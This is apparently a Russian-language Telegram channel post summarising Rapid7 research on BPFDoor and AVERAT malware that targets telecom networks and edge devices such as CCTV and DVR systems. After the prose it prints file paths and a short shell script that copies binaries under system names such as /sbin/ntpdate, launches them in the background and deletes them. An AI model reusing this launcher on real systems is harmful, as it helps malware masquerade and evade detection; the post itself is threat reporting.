TGViewer
CBUnit – главное в кибербезопасности CBUnit – главное в кибербезопасности @cbunit · 55 subscribers
Post #5275 5
BPFDoor и AVERAT атакуют периметр сети через SMTP и HTTPS

Rapid7 выявила новые варианты вредоносного ПО BPFDoor и AVERAT, нацеленные на телекоммуникационные компании и сетевые устройства.

Вредоносное ПО использует методы маскировки под легитимное программное обеспечение, включая подмену имён процессов и использование обычных сетевых протоколов, таких как SMTP, для обхода обнаружения. Атаки направлены на устройства на периметре сети, включая встроенные системы, такие как CCTV и DVR.

Исследователи обнаружили, что новые варианты BPFDoor используют HTTPS POST-запросы для передачи команд, что усложняет обнаружение с помощью традиционных методов анализа сетевого трафика. Вредоносное ПО также демонстрирует способность к самосохранению, запускаясь как фоновый процесс без видимых файлов на диске.

ⓘ Что такое BPFDoor
BPFDoor — это семейство вредоносного ПО, нацеленное на Linux-системы. Оно использует BPF (Berkeley Packet Filter) для фильтрации сетевого трафика и маскировки своей активности. Вредоносное ПО может имитировать легитимные процессы и использовать обычные сетевые протоколы для связи с управляющим сервером.

/tmp/flag                        (precondition gate — checked, never written)
/HDD/ms6x2xTo64/updIptable.php   (shell script under a .php extension)
/HDD/ms6x2xTo64/execProcEnd     (watchdog marker)

#!/bin/sh
/bin/cp -f /addpkg/sbin/update /sbin/ntpdate
chmod 755 /sbin/ntpdate
/sbin/ntpdate &
sleep 10
rm -rf /sbin/ntpdate
/bin/cp -f /addpkg/sbin/agetty /sbin/udevds
chmod 755 /sbin/udevds
/sbin/udevds &
sleep 10
rm -rf /sbin/udevds


Источник: Rapid7
@cbunit
More from @cbunit
  1. Oct 2, 2026Claude блокирует российских и гонконгских пользователей при доступе через VPN Пользователи…
  2. Oct 2, 2026Partisan Zmiy атаковала мед. организацию, используя VMware Tools и Telegram Разбор целиком…
  3. Oct 2, 2026«Солар» запустил SOC для среднего бизнеса с финансовой гарантией до 30 млн рублей «Солар»…
  4. Oct 2, 2026Страховые компании переходят на стандарт защиты информации Банка России с 2027 года С 1 ян…
  5. Oct 2, 2026В Cisco SD-WAN нашли критическую уязвимость, дающую полный доступ ▤ Разбор Cisco выпустила…
  6. Oct 2, 2026Skyeng усилил мониторинг угроз с помощью BI.Zone SOC Skyeng расширил мониторинг киберугроз…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →